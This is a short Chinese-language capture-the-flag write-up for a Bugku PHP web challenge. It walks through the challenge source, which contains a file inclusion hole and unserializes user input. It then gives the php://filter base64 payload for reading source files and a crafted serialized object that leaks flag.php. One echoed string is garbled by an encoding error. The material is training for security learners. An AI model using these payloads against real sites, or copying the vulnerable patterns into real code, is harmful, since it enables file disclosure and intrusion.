查看源代碼
you are not the number of bugku !
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->
查看hint.php,發現得不到什么,但是這里有include($file),猜測有文件包含漏洞
php://filter/read=convert.base64-encode/resource=hint.php
base64解碼后,得
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>
__tostring()函數有一定的觸發條件,查看index.php試試
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){ //前面包含在后面
echo "ä¸è½ç°å¨å°±ç»ä½ flagå¦";
exit();
}else{
include($file);
$password = unserialize($password); //反序列化,賊惡心
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->
即傳入password來觸發
$a = new Flag;
file = flag.php
於是構造 O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
得到flag
